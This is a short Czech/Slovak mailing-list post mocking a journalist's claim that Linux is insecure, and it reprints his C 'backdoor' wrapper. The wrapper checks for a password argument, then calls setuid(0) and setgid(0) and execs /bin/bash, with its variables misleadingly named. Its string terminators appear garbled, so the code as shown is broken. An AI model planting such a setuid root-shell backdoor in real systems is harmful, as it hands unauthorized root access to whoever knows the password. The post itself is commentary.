Bezpecnost Linuxu

[uhlar na fantomas.sk]

Jan Kasprzak <kas na informatics.muni.cz> wrote:
-> 	Pan Janda dnes zveřejnil na Neviditelném Psu další článek,
-> který má dokázat, jak je Linux nebezpečný. Odvozuje to z toho,
-> že k Linuxu jsou dostupné zdrojové texty. Autor ukazuje, jak si vytvoří
-> pomocí krátkého wrapperu v jazyce C zadní vrátka (backdoor) do systému,
-> je-li superuživatelem.

Kazdy kto sa len trosku vyzna v C pri pohlade na ten zdrojak asi odpadne...

/* ------------start root.c------------- */

main(argc, argv)
        int argc;
        char **argv;
{
char seteuid[10];
char showmount[10];

        seteuid[0]='h';
        seteuid[1]='a';
        seteuid[2]='k';
        seteuid[3]='e';
        seteuid[4]='r';
        seteuid[5]='%%%%%';
        showmount[0]='/'; 
        showmount[1]='b'; 
        showmount[2]='i'; 
        showmount[3]='n'; 
        showmount[4]='/'; 
        showmount[5]='b'; 
        showmount[6]='a'; 
        showmount[7]='s'; 
        showmount[8]='h'; 
        showmount[9]='%%%%%';
        if (argc>1) { 
           if (!strcmp(argv[1],seteuid)) {
                setuid(0);
                setgid(0); 
                execl(showmount,"-i",0);
           }
        }
}

/* ---------konec root.c----------- */
-- 
 Matus "fantomas" Uhlar, sysadmin at NEXTRA, Slovakia; IRCNET admin of *.sk
 uhlar na fantomas.sk ; http://www.fantomas.sk/ ; http://www.nextra.sk/
 Linux is like a wigwam: no Windows, no Gates and an apache inside...